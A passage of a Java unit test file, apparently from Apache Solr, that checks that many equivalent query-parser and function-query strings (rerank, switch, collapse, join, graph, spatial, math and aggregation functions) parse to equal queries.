"{!boost b=$myBoost}asdf", "{!boost b=$myBoost v=asdf}", "{!boost b=sum(3,foo_i)}foo_s:asdf"); } finally { req.close(); } } public void testReRankQuery() throws Exception { final String defType = ReRankQParserPlugin.NAME; SolrQueryRequest req = req("q", "*:*", "rqq", "{!edismax}hello", "rdocs", "20", "rweight", "2", "rows", "10", "start", "0"); try { assertQueryEquals(defType, req, "{!"+defType+" "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=$rdocs "+ReRankQParserPlugin.RERANK_WEIGHT+"=$rweight}", "{!"+defType+" "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=20 "+ReRankQParserPlugin.RERANK_WEIGHT+"=2}"); } finally { req.close(); } req = req("qq", "*:*", "rqq", "{!edismax}hello", "rdocs", "20", "rweight", "2", "rows", "100", "start", "50"); try { assertQueryEquals(defType, req, "{!"+defType+" mainQuery=$qq "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=$rdocs "+ReRankQParserPlugin.RERANK_WEIGHT+"=$rweight}", "{!"+defType+" mainQuery=$qq "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=20 "+ReRankQParserPlugin.RERANK_WEIGHT+"=2}"); } finally { req.close(); } } public void testExportQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals("xport", req, "{!xport}"); } finally { req.close(); } } public void testGraphTermsQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals("graphTerms", req, "{!graphTerms f=field1_s maxDocFreq=1000}term1,term2"); } finally { req.close(); } } public void testTlogitQuery() throws Exception { SolrQueryRequest req = req("q", "*:*", "feature", "f", "terms","a,b,c", "weights", "100,200,300", "idfs","1,5,7","iteration","1", "outcome","a","positiveLabel","1"); try { assertQueryEquals("tlogit", req, "{!tlogit}"); } finally { req.close(); } } public void testIGainQuery() throws Exception { SolrQueryRequest req = req("q", "*:*", "outcome", "b", "positiveLabel", "1", "field", "x", "numTerms","200"); try { assertQueryEquals("igain", req, "{!igain}"); } finally { req.close(); } } public void testSignificantTermsQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals(SignificantTermsQParserPlugin.NAME, req, "{!"+SignificantTermsQParserPlugin.NAME+"}"); } finally { req.close(); } } public void testQuerySwitch() throws Exception { SolrQueryRequest req = req("myXXX", "XXX", "myField", "foo_s", "myQ", "{!prefix f=$myField}asdf"); try { assertQueryEquals("switch", req, "{!switch case.foo=XXX case.bar=zzz case.yak=qqq}foo", "{!switch case.foo=qqq case.bar=XXX case.yak=zzz} bar ", "{!switch case.foo=qqq case.bar=XXX case.yak=zzz v=' bar '}", "{!switch default=XXX case.foo=qqq case.bar=zzz}asdf", "{!switch default=$myXXX case.foo=qqq case.bar=zzz}asdf", "{!switch case=XXX case.bar=zzz case.yak=qqq v=''}", "{!switch case.bar=zzz case=XXX case.yak=qqq v=''}", "{!switch case=XXX case.bar=zzz case.yak=qqq}", "{!switch case=XXX case.bar=zzz case.yak=qqq} ", "{!switch case=$myXXX case.bar=zzz case.yak=qqq} "); assertQueryEquals("switch", req, "{!switch case.foo=$myQ case.bar=zzz case.yak=qqq}foo", "{!query v=$myQ}"); } finally { req.close(); } } public void testMatchAllDocsQueryXmlParser() throws Exception { final String type = "xmlparser"; assertQueryEquals(type, "{!"+type+"}<MatchAllDocsQuery/>", "<MatchAllDocsQuery/>", "<MatchAllDocsQuery></MatchAllDocsQuery>"); } public void testQueryDismax() throws Exception { for (final String type : new String[]{"dismax","edismax"}) { assertQueryEquals(type, "{!"+type+"}apache solr", "apache solr", "apache solr", "apache solr "); assertQueryEquals(type, "+apache +solr", "apache AND solr", " +apache +solr"); } } public void testField() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("field", req, "{!field f=$myField}asdf", "{!field f=$myField v=asdf}", "{!field f=foo_s}asdf"); } finally { req.close(); } } public void testQueryRaw() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("raw", req, "{!raw f=$myField}asdf", "{!raw f=$myField v=asdf}", "{!raw f=foo_s}asdf"); } finally { req.close(); } } public void testQueryTerm() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("term", req, "{!term f=$myField}asdf", "{!term f=$myField v=asdf}", "{!term f=foo_s}asdf"); } finally { req.close(); } } public void testQueryCollapse() throws Exception { SolrQueryRequest req = req("myField","foo_s1", "g_sort","foo_s1 asc, foo_i desc"); try { assertQueryEquals("collapse", req, "{!collapse field=$myField}"); assertQueryEquals("collapse", req, "{!collapse field=$myField max=a}"); assertQueryEquals("collapse", req, "{!collapse field=$myField min=a}", "{!collapse field=$myField min=a nullPolicy=ignore}"); assertQueryEquals("collapse", req, "{!collapse field=$myField sort=$g_sort}", "{!collapse field=$myField sort='foo_s1 asc, foo_i desc'}", "{!collapse field=$myField sort=$g_sort nullPolicy=ignore}"); assertQueryEquals("collapse", req, "{!collapse field=$myField max=a nullPolicy=expand}"); //Add boosted documents to the request context. Map context = req.getContext(); Set boosted = new HashSet(); boosted.add("doc1"); boosted.add("doc2"); context.put("BOOSTED", boosted); assertQueryEquals("collapse", req, "{!collapse field=$myField min=a}", "{!collapse field=$myField min=a nullPolicy=ignore}"); } finally { req.close(); } } public void testHash() throws Exception { SolrQueryRequest req = req("partitionKeys","foo_s"); try { assertQueryEquals("hash", req, "{!hash workers=3 worker=0}"); } finally { req.close(); } } public void testQueryNested() throws Exception { SolrQueryRequest req = req("df", "foo_s"); try { assertQueryEquals("query", req, "{!query defType=lucene}asdf", "{!query v='foo_s:asdf'}", "{!query}foo_s:asdf", "{!query}asdf"); } finally { req.close(); } } public void testQueryFunc() throws Exception { // more involved tests of specific functions in other methods SolrQueryRequest req = req("myVar", "5", "myField","foo_i", "myInner","product(4,foo_i)"); try { assertQueryEquals("func", req, "{!func}sum(4,5)", "{!func}sum(4,$myVar)", "sum(4,5)"); assertQueryEquals("func", req, "{!func}sum(1,2,3,4,5)", "{!func}sum(1,2,3,4,$myVar)", "sum(1,2,3,4,5)"); assertQueryEquals("func", req, "{!func}sum(4,$myInner)", "{!func}sum(4,product(4,foo_i))", "{!func}sum(4,product(4,$myField))", "{!func}sum(4,product(4,field(foo_i)))"); } finally { req.close(); } } public void testQueryFrange() throws Exception { SolrQueryRequest req = req("myVar", "5", "low","0.2", "high", "20.4", "myField","foo_i", "myInner","product(4,foo_i)"); try { // NOTE: unlike most queries, frange defaultsto cost==100 assertQueryEquals("frange", req, "{!frange l=0.2 h=20.4}sum(4,5)", "{!frange l=0.2 h=20.4 cost=100}sum(4,5)", "{!frange l=$low h=$high}sum(4,$myVar)"); } finally { req.close(); } } public void testQueryGeofilt() throws Exception { checkQuerySpatial("geofilt"); } public void testQueryBbox() throws Exception { checkQuerySpatial("bbox"); } public void testLocalParamsWithRepeatingParam() throws Exception { SolrQueryRequest req = req("q", "foo", "bq", "111", "bq", "222"); try { assertQueryEquals("dismax", req, "{!dismax}foo", "{!dismax bq=111 bq=222}foo", "{!dismax bq=222 bq=111}foo"); } finally { req.close(); } } private void checkQuerySpatial(final String type) throws Exception { SolrQueryRequest req = req("myVar", "5", "d","109", "pt","10.312,-20.556", "sfield","store"); try { assertQueryEquals(type, req, "{!"+type+" d=109}", "{!"+type+" sfield=$sfield}", "{!"+type+" sfield=store d=109}", "{!"+type+" sfield=store d=$d pt=$pt}", "{!"+type+" sfield=store d=$d pt=10.312,-20.556}", "{!"+type+"}"); // diff SpatialQueryable FieldTypes matter for determining final query assertQueryEquals(type, req, "{!"+type+" sfield=point_hash}", "{!"+type+" sfield=point_hash d=109}", "{!"+type+" sfield=point_hash d=$d pt=$pt}", "{!"+type+" sfield=point_hash d=$d pt=10.312,-20.556}"); assertQueryEquals(type, req, "{!"+type+" sfield=point}", "{!"+type+" sfield=point d=109}", "{!"+type+" sfield=point d=$d pt=$pt}", "{!"+type+" sfield=point d=$d pt=10.312,-20.556}"); } finally { req.close(); } } public void testQueryJoin() throws Exception { SolrQueryRequest req = req("myVar", "5", "df","text", "ff","foo_s", "tt", "bar_s"); try { assertQueryEquals("join", req, "{!join from=foo_s to=bar_s}asdf", "{!join from=$ff to=$tt}asdf", "{!join from=$ff to='bar_s'}text:asdf"); } finally { req.close(); } } public void testQueryScoreJoin() throws Exception { SolrQueryRequest req = req("myVar", "5", "df", "text", "ff", "foo_s", "tt", "bar_s", "scoreavg","avg"); try { assertQueryEquals("join", req, "{!join from=foo_s to=bar_s score=avg}asdf", "{!join from=$ff to=$tt score=Avg}asdf", "{!join from=$ff to='bar_s' score=$scoreavg}text:asdf"); } finally { req.close(); } } public void testTerms() throws Exception { assertQueryEquals("terms", "{!terms f=foo_i}10,20,30,-10,-20,-30", "{!terms f=foo_i}10,20,30,-10,-20,-30"); } public void testBlockJoin() throws Exception { assertQueryEquals("parent", "{!parent which=foo_s:parent}dude", "{!parent which=foo_s:parent}dude"); assertQueryEquals("child", "{!child of=foo_s:parent}dude", "{!child of=foo_s:parent}dude"); // zero query case assertQueryEquals(null, "{!parent which=foo_s:parent}", "{!parent which=foo_s:parent}"); assertQueryEquals(null, "{!child of=foo_s:parent}", "{!child of=foo_s:parent}"); assertQueryEquals(null, "{!parent which='+*:* -foo_s:parent'}", "{!child of=foo_s:parent}"); final SolrQueryRequest req = req( "fq","bar_s:baz","fq","{!tag=fqban}bar_s:ban", "ffq","bar_s:baz","ffq","{!tag=ffqban}bar_s:ban"); try { assertQueryEquals("filters", req, "{!parent which=foo_s:parent param=$fq}foo_s:bar", "{!parent which=foo_s:parent param=$ffq}foo_s:bar" // differently named params ); assertQueryEquals("filters", req, "{!parent which=foo_s:parent param=$fq excludeTags=fqban}foo_s:bar", "{!parent which=foo_s:parent param=$ffq excludeTags=ffqban}foo_s:bar" // differently named params ); QueryUtils.checkUnequal(// parent filter is not an equal to child QParser.getParser("{!child of=foo_s:parent}", req).getQuery(), QParser.getParser("{!parent which=foo_s:parent}", req).getQuery()); } finally { req.close(); } } public void testFilters() throws Exception { final SolrQueryRequest req = req( "fq","bar_s:baz","fq","{!tag=fqban}bar_s:ban", "ffq","{!tag=ffqbaz}bar_s:baz","ffq","{!tag=ffqban}bar_s:ban"); try { assertQueryEquals("filters", req, "{!filters param=$fq}foo_s:bar", "{!filters param=$fq}foo_s:bar", "{!filters param=$ffq}foo_s:bar" // differently named params ); assertQueryEquals("filters", req, "{!filters param=$fq excludeTags=fqban}foo_s:bar", "{!filters param=$ffq excludeTags=ffqban}foo_s:bar" ); assertQueryEquals("filters", req, "{!filters excludeTags=top}{!tag=top v='foo_s:bar'}", "{!filters param=$ffq excludeTags='ffqban,ffqbaz'}" ); QueryUtils.checkUnequal( QParser.getParser("{!filters param=$fq}foo_s:bar", req).getQuery(), QParser.getParser("{!filters param=$fq excludeTags=fqban}foo_s:bar", req).getQuery()); } finally { req.close(); } } public void testGraphQuery() throws Exception { SolrQueryRequest req = req("from", "node_s", "to","edge_s", "traversalFilter","foo", "returnOnlyLeaf","true", "returnRoot","false", "maxDepth","2", "useAutn","false" ); // make sure all param subsitution works for all args to graph query. assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s}*:*", "{!graph from=$from to=$to}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false maxDepth=2}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot maxDepth=$maxDepth}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false maxDepth=2 useAutn=false}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot maxDepth=$maxDepth useAutn=$useAutn}*:*"); } public void testQuerySurround() throws Exception { assertQueryEquals("surround", "{!surround}and(apache,solr)", "and(apache,solr)", "apache AND solr"); } public void testQueryComplexPhrase() throws Exception { assertQueryEquals("complexphrase", "{!complexphrase df=text}\"jo* smith\"", "text:\"jo* smith\""); assertQueryEquals("complexphrase", "{!complexphrase df=title}\"jo* smith\"", "title:\"jo* smith\""); } public void testFuncTestfunc() throws Exception { assertFuncEquals("testfunc(foo_i)","testfunc(field(foo_i))"); assertFuncEquals("testfunc(23)"); assertFuncEquals("testfunc(sum(23,foo_i))", "testfunc(sum(23,field(foo_i)))"); } public void testFuncOrd() throws Exception { assertFuncEquals("ord(foo_s)","ord(foo_s )"); } public void testFuncLiteral() throws Exception { SolrQueryRequest req = req("someVar","a string"); try { assertFuncEquals(req, "literal('a string')","literal(\"a string\")", "literal($someVar)"); } finally { req.close(); } } public void testFuncRord() throws Exception { assertFuncEquals("rord(foo_s)","rord(foo_s )"); } public void testFuncCscore() throws Exception { assertFuncEquals("cscore()", "cscore( )"); } public void testFuncTop() throws Exception { assertFuncEquals("top(sum(3,foo_i))"); } public void testFuncLinear() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "linear(foo_i,$someVar,42)", "linear(foo_i, 27, 42)"); } finally { req.close(); } } public void testFuncRecip() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "recip(foo_i,$someVar,42, 27 )", "recip(foo_i, 27, 42,$someVar)"); } finally { req.close(); } } public void testFuncScale() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "scale(field(foo_i),$someVar,42)", "scale(foo_i, 27, 42)"); } finally { req.close(); } } public void testFuncDiv() throws Exception { assertFuncEquals("div(5,4)", "div(5, 4)"); assertFuncEquals("div(foo_i,4)", "div(foo_i, 4)", "div(field('foo_i'), 4)"); assertFuncEquals("div(foo_i,sub(4,field('bar_i')))", "div(field(foo_i), sub(4,bar_i))"); } public void testFuncMod() throws Exception { assertFuncEquals("mod(5,4)", "mod(5, 4)"); assertFuncEquals("mod(foo_i,4)", "mod(foo_i, 4)", "mod(field('foo_i'), 4)"); assertFuncEquals("mod(foo_i,sub(4,field('bar_i')))", "mod(field(foo_i), sub(4,bar_i))"); } public void testFuncMap() throws Exception { assertFuncEquals("map(field(foo_i), 0, 45, 100)", "map(foo_i, 0.0, 45, 100)"); } public void testFuncSum() throws Exception { assertFuncEquals("sum(5,4)", "add(5, 4)"); assertFuncEquals("sum(5,4,3,2,1)", "add(5, 4, 3, 2, 1)"); assertFuncEquals("sum(foo_i,4)", "sum(foo_i, 4)", "sum(field('foo_i'), 4)"); assertFuncEquals("add(foo_i,sub(4,field('bar_i')))", "sum(field(foo_i), sub(4,bar_i))"); } public void testFuncProduct() throws Exception { assertFuncEquals("product(5,4,3,2,1)", "mul(5, 4, 3, 2, 1)"); assertFuncEquals("product(5,4)", "mul(5, 4)"); assertFuncEquals("product(foo_i,4)", "product(foo_i, 4)", "product(field('foo_i'), 4)"); assertFuncEquals("mul(foo_i,sub(4,field('bar_i')))", "product(field(foo_i), sub(4,bar_i))"); } public void testFuncSub() throws Exception { assertFuncEquals("sub(5,4)", "sub(5, 4)"); assertFuncEquals("sub(foo_i,4)", "sub(foo_i, 4)"); assertFuncEquals("sub(foo_i,sum(4,bar_i))", "sub(foo_i, sum(4,bar_i))"); } public void testFuncVector() throws Exception { assertFuncEquals("vector(5,4, field(foo_i))", "vector(5, 4, foo_i)"); assertFuncEquals("vector(foo_i,4)", "vector(foo_i, 4)"); assertFuncEquals("vector(foo_i,sum(4,bar_i))", "vector(foo_i, sum(4,bar_i))"); } public void testFuncQuery() throws Exception { SolrQueryRequest req = req("myQ","asdf"); try { assertFuncEquals(req, "query($myQ)", "query($myQ,0)", "query({!lucene v=$myQ},0)"); } finally { req.close(); } } public void testFuncBoost() throws Exception { SolrQueryRequest req = req("myQ","asdf"); try { assertFuncEquals(req, "boost($myQ,sum(4,5))", "boost({!lucene v=$myQ},sum(4,5))"); } finally { req.close(); } } public void testFuncJoindf() throws Exception { assertFuncEquals("joindf(foo,bar)"); } public void testFuncGeodist() throws Exception { SolrQueryRequest req = req("pt","10.312,-20.556", "sfield","store"); try { assertFuncEquals(req, "geodist()", "geodist($sfield,$pt)", "geodist(store,$pt)", "geodist(field(store),$pt)", "geodist(store,10.312,-20.556)"); } finally { req.close(); } } public void testFuncHsin() throws Exception { assertFuncEquals("hsin(45,true,0,0,45,45)"); } public void testFuncGhhsin() throws Exception { assertFuncEquals("ghhsin(45,point_hash,'asdf')", "ghhsin(45,field(point_hash),'asdf')"); } public void testFuncGeohash() throws Exception { assertFuncEquals("geohash(45,99)"); } public void testFuncDist() throws Exception { assertFuncEquals("dist(2,45,99,101,111)", "dist(2,vector(45,99),vector(101,111))"); } public void testFuncSqedist() throws Exception { assertFuncEquals("sqedist(45,99,101,111)", "sqedist(vector(45,99),vector(101,111))"); } public void testFuncMin() throws Exception { assertFuncEquals("min(5,4,3,2,1)", "min(5, 4, 3, 2, 1)"); assertFuncEquals("min(foo_i,4)", "min(field('foo_i'), 4)"); assertFuncEquals("min(foo_i,sub(4,field('bar_i')))", "min(field(foo_i), sub(4,bar_i))"); } public void testFuncMax() throws Exception { assertFuncEquals("max(5,4,3,2,1)", "max(5, 4, 3, 2, 1)"); assertFuncEquals("max(foo_i,4)", "max(field('foo_i'), 4)"); assertFuncEquals("max(foo_i,sub(4,field('bar_i')))", "max(field(foo_i), sub(4,bar_i))"); } public void testFuncMs() throws Exception { // Note ms() takes in field name, not field(...) assertFuncEquals("ms()", "ms(NOW)"); assertFuncEquals("ms(2000-01-01T00:00:00Z)", "ms('2000-01-01T00:00:00Z')"); assertFuncEquals("ms(myDateField_dt)", "ms('myDateField_dt')"); assertFuncEquals("ms(2000-01-01T00:00:00Z,myDateField_dt)", "ms('2000-01-01T00:00:00Z','myDateField_dt')"); assertFuncEquals("ms(myDateField_dt, NOW)", "ms('myDateField_dt', NOW)"); } public void testFuncMathConsts() throws Exception { assertFuncEquals("pi()"); assertFuncEquals("e()"); } public void testFuncTerms() throws Exception { SolrQueryRequest req = req("myField","field_t","myTerm","my term"); try { for (final String type : new String[]{"docfreq","termfreq", "totaltermfreq","ttf", "idf","tf"}) { // NOTE: these functions takes a field *name* not a field(..) source assertFuncEquals(req, type + "('field_t','my term')", type + "(field_t,'my term')", type + "(field_t,$myTerm)", type + "(field_t,$myTerm)", type + "($myField,$myTerm)"); } // ttf is an alias for totaltermfreq assertFuncEquals(req, "ttf(field_t,'my term')", "ttf('field_t','my term')", "totaltermfreq(field_t,'my term')"); } finally { req.close(); } } public void testFuncSttf() throws Exception { // sttf is an alias for sumtotaltermfreq assertFuncEquals("sttf(foo_t)", "sttf('foo_t')", "sumtotaltermfreq(foo_t)", "sumtotaltermfreq('foo_t')"); assertFuncEquals("sumtotaltermfreq('foo_t')"); } public void testFuncNorm() throws Exception { assertFuncEquals("norm(foo_t)","norm('foo_t')"); } public void testFuncMaxdoc() throws Exception { assertFuncEquals("maxdoc()"); } public void testFuncNumdocs() throws Exception { assertFuncEquals("numdocs()"); } public void testFuncBools() throws Exception { SolrQueryRequest req = req("myTrue","true","myFalse","false"); try { assertFuncEquals(req, "true","$myTrue"); assertFuncEquals(req, "false","$myFalse"); } finally { req.close(); } } public void testFuncExists() throws Exception { SolrQueryRequest req = req("myField","field_t","myQ","asdf"); try { assertFuncEquals(req, "exists(field_t)", "exists($myField)", "exists(field('field_t'))", "exists(field($myField))"); assertFuncEquals(req, "exists(query($myQ))", "exists(query({!lucene v=$myQ}))"); } finally { req.close(); } } public void testFuncNot() throws Exception { SolrQueryRequest req = req("myField","field_b", "myTrue","true"); try { assertFuncEquals(req, "not(true)", "not($myTrue)"); assertFuncEquals(req, "not(not(true))", "not(not($myTrue))"); assertFuncEquals(req, "not(field_b)", "not($myField)", "not(field('field_b'))", "not(field($myField))"); assertFuncEquals(req, "not(exists(field_b))", "not(exists($myField))", "not(exists(field('field_b')))", "not(exists(field($myField)))"); } finally { req.close(); } } public void testFuncDoubleValueBools() throws Exception { SolrQueryRequest req = req("myField","field_b","myTrue","true"); try { for (final String type : new String[]{"and","or","xor"}) { assertFuncEquals(req, type + "(field_b,true)", type + "(field_b,$myTrue)", type + "(field('field_b'),true)", type + "(field($myField),$myTrue)", type + "($myField,$myTrue)"); } } finally { req.close(); } } public void testFuncIf() throws Exception { SolrQueryRequest req = req("myBoolField","foo_b", "myIntField","bar_i", "myTrue","true"); try { assertFuncEquals(req, "if(foo_b,bar_i,25)", "if($myBoolField,bar_i,25)", "if(field('foo_b'),$myIntField,25)", "if(field($myBoolField),field('bar_i'),25)"); assertFuncEquals(req, "if(true,37,field($myIntField))", "if($myTrue,37,$myIntField)"); } finally { req.close(); } } public void testFuncDef() throws Exception { SolrQueryRequest req = req("myField","bar_f"); try { assertFuncEquals(req, "def(bar_f,25)", "def($myField,25)", "def(field('bar_f'),25)"); assertFuncEquals(req, "def(ceil(bar_f),25)", "def(ceil($myField),25)", "def(ceil(field('bar_f')),25)"); } finally { req.close(); } } public void testFuncConcat() throws Exception { SolrQueryRequest req = req("myField","bar_f","myOtherField","bar_t"); try { assertFuncEquals(req, "concat(bar_f,bar_t)", "concat($myField,bar_t)", "concat(bar_f,$myOtherField)", "concat($myField,$myOtherField)"); } finally { req.close(); } } public void testFuncSingleValueMathFuncs() throws Exception { SolrQueryRequest req = req("myVal","45", "myField","foo_i"); for (final String func : new String[] {"abs","rad","deg","sqrt","cbrt", "log","ln","exp","sin","cos","tan", "asin","acos","atan", "sinh","cosh","tanh", "ceil","floor","rint"}) { try { assertFuncEquals(req, func + "(field(foo_i))", func + "(foo_i)", func + "($myField)"); assertFuncEquals(req, func + "(45)", func+ "($myVal)"); } finally { req.close(); } } } public void testFuncDoubleValueMathFuncs() throws Exception { SolrQueryRequest req = req("myVal","45", "myOtherVal", "27", "myField","foo_i"); for (final String func : new String[] {"pow","hypot","atan2"}) { try { assertFuncEquals(req, func + "(field(foo_i),$myVal)", func+"(foo_i,$myVal)", func + "($myField,45)"); assertFuncEquals(req, func+"(45,$myOtherVal)", func+"($myVal,27)", func+"($myVal,$myOtherVal)"); } finally { req.close(); } } } public void testFuncStrdist() throws Exception { SolrQueryRequest req = req("myVal","zot", "myOtherVal", "yak", "myField","foo_s1"); try { assertFuncEquals(req, "strdist(\"zot\",literal('yak'),edit)", "strdist(literal(\"zot\"),'yak', edit )", "strdist(literal($myVal),literal($myOtherVal),edit)"); assertFuncEquals(req, "strdist(\"zot\",literal($myOtherVal),ngram)", "strdist(\"zot\",'yak', ngram, 2)"); assertFuncEquals(req, "strdist(field('foo_s1'),literal($myOtherVal),jw)", "strdist(field($myField),\"yak\",jw)", "strdist($myField,'yak', jw)"); } finally { req.close(); } } public void testFuncField() throws Exception { assertFuncEquals("field(\"foo_i\")", "field('foo_i\')", "foo_i"); // simple VS of single valued field should be same as asking for min/max on that field assertFuncEquals("field(\"foo_i\")", "field('foo_i',min)", "field(foo_i,'min')", "field('foo_i',max)", "field(foo_i,'max')", "foo_i"); // multivalued field with selector String multif = "multi_int_with_docvals"; SolrQueryRequest req = req("my_field", multif); // this test is only viable if it's a multivalued field, sanity check the schema assertTrue(multif + " is no longer multivalued, who broke this schema?", req.getSchema().getField(multif).multiValued()); assertFuncEquals(req, "field($my_field,'MIN')", "field('"+multif+"',min)"); assertFuncEquals(req, "field($my_field,'max')", "field('"+multif+"',Max)"); } public void testFuncCurrency() throws Exception { assertFuncEquals("currency(\"amount\")", "currency('amount\')", "currency(amount)", "currency(amount,USD)", "currency('amount',USD)"); } public void testFuncRelatedness() throws Exception { SolrQueryRequest req = req("fore","foo_s:front", "back","foo_s:back"); try { assertFuncEquals(req, "agg_relatedness({!query v='foo_s:front'}, {!query v='foo_s:back'})", "agg_relatedness($fore, $back)"); } finally { req.close(); } } public void testTestFuncs() throws Exception { assertFuncEquals("sleep(1,5)", "sleep(1,5)"); assertFuncEquals("threadid()", "threadid()"); } // TODO: more tests public void testQueryMaxScore() throws Exception { assertQueryEquals("maxscore", "{!maxscore}A OR B OR C", "A OR B OR C"); assertQueryEquals("maxscore", "{!maxscore}A AND B", "A AND B"); assertQueryEquals("maxscore", "{!maxscore}apache -solr", "apache -solr", "apache -solr "); assertQueryEquals("maxscore", "+apache +solr", "apache AND solr", "+apache +solr"); } /** * this test does not assert anything itself, it simply toggles a static * boolean informing an @AfterClass method to assert that every default * qparser and valuesource parser configured was recorded by * assertQueryEquals and assertFuncEquals. */ public void testParserCoverage() { doAssertParserCoverage = true; } public void testQuerySimple() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("simple", req, "{!simple f=$myField}asdf", "{!simple f=$myField v=asdf}", "{!simple f=foo_s}asdf"); } finally { req.close(); } } public void testQueryMLT() throws Exception { assertU(adoc("id", "1", "lowerfilt", "sample data")); assertU(commit()); try { assertQueryEquals("mlt", "{!mlt qf=lowerfilt}1", "{!mlt qf=lowerfilt v=1}"); } finally { delQ("*:*"); assertU(commit()); } } /** * NOTE: defType is not only used to pick the parser, but also to record * the parser being tested for coverage sanity checking * @see #testParserCoverage * @see #assertQueryEquals */ protected void assertQueryEquals(final String defType, final String... inputs) throws Exception { SolrQueryRequest req = req(new String[] {"df", "text"}); try { assertQueryEquals(defType, req, inputs); } finally { req.close(); } } /** * NOTE: defType is not only used to pick the parser, but, if non-null it is * also to record the parser being tested for coverage sanity checking * * @see QueryUtils#check * @see QueryUtils#checkEqual * @see #testParserCoverage */ protected void assertQueryEquals(final String defType, final SolrQueryRequest req, final String... inputs) throws Exception { if (null != defType) qParsersTested.add(defType); final Query[] queries = new Query[inputs.length]; try { SolrQueryResponse rsp = new SolrQueryResponse(); SolrRequestInfo.setRequestInfo(new SolrRequestInfo(req,rsp)); for (int i = 0; i < inputs.length; i++) { queries[i] = QParser.getParser(inputs[i], defType, true, req).getQuery(); } } finally { SolrRequestInfo.clearRequestInfo(); } for (int i = 0; i < queries.length; i++) { QueryUtils.check(queries[i]); // yes starting j=0 is redundent, we're making sure every query // is equal to itself, and that the quality checks work regardless // of which caller/callee is used. for (int j = 0; j < queries.length; j++) { QueryUtils.checkEqual(queries[i], queries[j]); } } } /** * the function name for val parser coverage checking is extracted from * the first input * @see #assertQueryEquals * @see #testParserCoverage */ protected void assertFuncEquals(final String... inputs) throws Exception { SolrQueryRequest req = req(); try { assertFuncEquals(req, inputs); } finally { req.close(); } } /** * the function name for val parser coverage checking is extracted from * the first input * @see #assertQueryEquals * @see #testParserCoverage */ protected void assertFuncEquals(final SolrQueryRequest req, final String... inputs) throws Exception { // pull out the function name final String funcName = (new StrParser(inputs[0])).getId(); valParsersTested.add(funcName); assertQueryEquals(FunctionQParserPlugin.NAME, req, inputs); } public void testAggs() throws Exception { assertFuncEquals("agg(avg(foo_i))", "agg(avg(foo_i))"); assertFuncEquals("agg(avg(foo_i))", "agg_avg(foo_i)"); assertFuncEquals("agg_min(foo_i)", "agg(min(foo_i))"); assertFuncEquals("agg_max(foo_i)", "agg(max(foo_i))"); assertFuncEquals("agg_avg(foo_i)", "agg_avg(foo_i)"); assertFuncEquals("agg_sum(foo_i)", "agg_sum(foo_i)"); assertFuncEquals("agg_count()", "agg_count()"); assertFuncEquals("agg_unique(foo_i)", "agg_unique(foo_i)"); assertFuncEquals("agg_uniqueBlock(foo_i)", "agg_uniqueBlock(foo_i)"); assertFuncEquals("agg_hll(foo_i)", "agg_hll(foo_i)"); assertFuncEquals("agg_sumsq(foo_i)", "agg_sumsq(foo_i)"); assertFuncEquals("agg_percentile(foo_i,50)", "agg_percentile(foo_i,50)"); assertFuncEquals("agg_variance(foo_i)", "agg_variance(foo_i)"); assertFuncEquals("agg_stddev(foo_i)", "agg_stddev(foo_i)"); // assertFuncEquals("agg_multistat(foo_i)", "agg_multistat(foo_i)"); } public void testCompares() throws Exception { assertFuncEquals("gt(foo_i,2)", "gt(foo_i, 2)"); assertFuncEquals("gt(foo_i,2)", "gt(foo_i,2)"); assertFuncEquals("lt(foo_i,2)", "lt(foo_i,2)"); assertFuncEquals("lte(foo_i,2)", "lte(foo_i,2)"); assertFuncEquals("gte(foo_i,2)", "gte(foo_i,2)"); assertFuncEquals("eq(foo_i,2)", "eq(foo_i,2)"); boolean equals = false; try { assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)"); equals = true; } catch (AssertionError e) { //expected } assertFalse(equals); } public void testChildField() throws Exception { final SolrQueryRequest req = req("q", "{!parent which=type_s1:parent}whatever_s1:foo"); try { assertFuncEquals(req, "childfield(name_s1,$q)", "childfield(name_s1,$q)"); } finally { req.close(); } } public void testPayloadScoreQuery() throws Exception { // I don't see a precedent to test query inequality in here, so doing a `try` // There was a bug with PayloadScoreQuery's .equals() method that said two queries were equal with different includeSpanScore settings try { assertQueryEquals ("payload_score" , "{!payload_score f=foo_dpf v=query func=min includeSpanScore=false}" , "{!payload_score f=foo_dpf v=query func=min includeSpanScore=true}" ); fail("queries should not have been equal"); } 